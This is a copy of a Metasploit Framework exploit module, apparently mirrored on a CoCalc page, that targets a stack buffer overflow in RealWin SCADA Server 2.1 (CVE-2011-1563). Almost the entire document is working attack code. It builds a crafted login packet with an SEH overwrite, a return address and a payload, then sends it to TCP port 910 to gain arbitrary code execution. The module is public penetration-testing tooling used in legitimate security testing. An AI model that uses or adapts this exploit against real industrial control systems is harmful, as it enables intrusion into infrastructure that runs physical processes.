Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/realwin_on_fcs_login.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'RealWin SCADA Server DATAC Login Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in DATAC Control

19
          International RealWin SCADA Server 2.1 (Build 6.0.10.10) or

20
          earlier.  By sending a specially crafted On_FC_CONNECT_FCS_LOGIN

21
          packet containing a long username, an attacker may be able to

22
          execute arbitrary code.

23
        },

24
        'Author' => [

25
          'Luigi Auriemma', # discovery

26
          'MC',

27
          'B|H <bh[AT]bufferattack.com>'

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          [ 'CVE', '2011-1563'],

32
          [ 'OSVDB', '72824'],

33
          [ 'URL', 'http://aluigi.altervista.org/adv/realwin_2-adv.txt' ],

34
          [ 'URL', 'http://www.dataconline.com/software/realwin.php' ],

35
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01']

36
        ],

37
        'Privileged' => true,

38
        'DefaultOptions' => {

39
          'EXITFUNC' => 'thread',

40
        },

41
        'Payload' => {

42
          'Space' => 450,

43
          'BadChars' => "\x00\x20\x0a\x0d",

44
          'StackAdjustment' => -3500,

45
        },

46
        'Platform' => 'win',

47
        'Targets' => [

48
          [

49
            'Universal',

50
            {

51
              'Offset' => 392, # Offset to SEH

52
              'Ret' => 0x40012540, # pop/pop/ret @FlexMLang.dll

53
            }

54
          ],

55
        ],

56
        'DefaultTarget' => 0,

57
        'DisclosureDate' => '2011-03-21',

58
        'Notes' => {

59
          'Reliability' => UNKNOWN_RELIABILITY,

60
          'Stability' => UNKNOWN_STABILITY,

61
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

62
        }

63
      )

64
    )

65


66
    register_options([Opt::RPORT(910)])

67
  end

68


69
  def exploit

70
    data = [0x67542310].pack('V')

71
    data << [0x00000824].pack('V')

72
    data << [0x00110011].pack('V')

73
    data << "\x01\x00"

74
    data << rand_text_alpha_upper(target['Offset'])

75
    data << generate_seh_payload(target.ret)

76
    data << rand_text_alpha_upper(17706 - payload.encoded.length)

77
    data << [0x451c3500].pack('V')

78
    data << [0x00000154].pack('V')

79
    data << [0x00020040].pack('V')

80


81
    connect

82
    print_status("Trying target #{target.name}...")

83
    sock.put(data)

84
    select(nil, nil, nil, 0.5)

85
    handler

86
    disconnect

87
  end

88
end

89


90